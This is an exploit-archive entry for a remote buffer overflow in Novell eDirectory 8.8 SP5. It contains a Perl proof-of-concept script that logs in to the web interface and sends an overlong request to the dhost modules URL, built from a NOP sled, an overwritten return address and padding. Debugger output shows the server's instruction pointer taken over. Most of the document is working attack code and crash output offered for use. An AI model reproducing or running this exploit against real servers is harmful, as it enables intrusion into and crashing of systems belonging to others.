Novell eDirectory 8.8sp5 BoF

2009-10-26T00:00:00
ID 1337DAY-ID-9569
Type zdt
Reporter Karak0rsan
Modified 2009-10-26T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            ============================
Novell eDirectory 8.8sp5 BoF
============================


# Title: Novell eDirectory 8.8sp5 BoF
# CVE-ID: ()
# OSVDB-ID: ()
# Author: karak0rsan, murderkey
# Published: 2009-10-26
# Verified: yes


view source
print?
#PoC for Vulnerability:
#!usr\bin\perl
#Novell eDirectory 8.8 SP5 BoF Vuln - 0day
#Vulnerability found in Hellcode Labs.
#karak0rsan || murderkey
#info[at]hellcode.net || www.hellcode.net
#to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)"

 
use WWW::Mechanize;
 
use LWP::Debug qw(+);
 
use HTTP::Cookies;
 
$target=$ARGV[0];
 
 
if(!$ARGV[0]){
 
        print "Novell eDirectory 8.8 SP5 Exploit\n";
 
        print "Hellcode Research || Hellcode.net\n";
 
        print "Usage:perl $0 [target]\n";
     
exit();
}
 
 
 
$login_url = "$target/_LOGIN_SERVER_";
 
$url = "$target/dhost/";
 
$vuln = "modules?L:";
 
$nop = "\x90" x 1668;
 
$eip = "\xef\xbe\xad\xde";
 
$data = "B" x 235;
 
 
$hellcode = $vuln.$nop.$eip.$data;
 
########Write your usr and pwd########
 
      $username = "Admin.context";
  
      $password = "1234";
 
  
my $mechanize = WWW::Mechanize->new();
 
 
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
 
 
$mechanize->timeout($url_timeout);
 
$res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));
 
 
    $mechanize->submit_form(
 
                  form_name => "authenticator",
 
                  fields    => {       
             
                     usr => $username,
 
                     pwd => $password},
 
                     button => 'Login');
 
$response2 = $mechanize->get("$url$hellcode");
 
 
 
##Debugger Results of PoC:
 
Windbg- File>Attach to a process>dhost.exe
 
eax=7ff43000 ebx=00000000 ecx=00000000 edx=778ad094 esi=00000000 edi=00000000
eip=77867dfe esp=1630ff5c ebp=1630ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\Windows\system32\ntdll.dll -
ntdll!DbgBreakPoint:
77867dfe cc              int     3
0:088> g
 
Debuggee is running...
 
 
##C:\Users\DELL\Videos\karak0rsan\Perl\bin>perl novelbof.pl
 
##Debugger Results after running poc:
 
(1cc.1d44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000042 ebx=15700796 ecx=038af878 edx=038b0000 esi=038af62c edi=038af878
eip=75c11684 esp=038af5c0 ebp=038af660 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for
C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.3053_none_d08d7bba442a9b36\MSVCR80.dll -
MSVCR80!vfwprintf_p+0x5b:
75c11684 8802            mov     byte ptr [edx],al          ds:0023:038b0000=??
 
-- EAX = 00000042 (writed a part of eax)
 
##0:010> g
 
(8e4.bb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=deadbeef edx=77879bad esi=00000000 edi=00000000
eip=deadbeef esp=036bf1f0 ebp=036bf210 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
deadbeef ??              ???
 
#EIP=deadbeef - We controled eip ;)



#  0day.today [2018-02-07]  #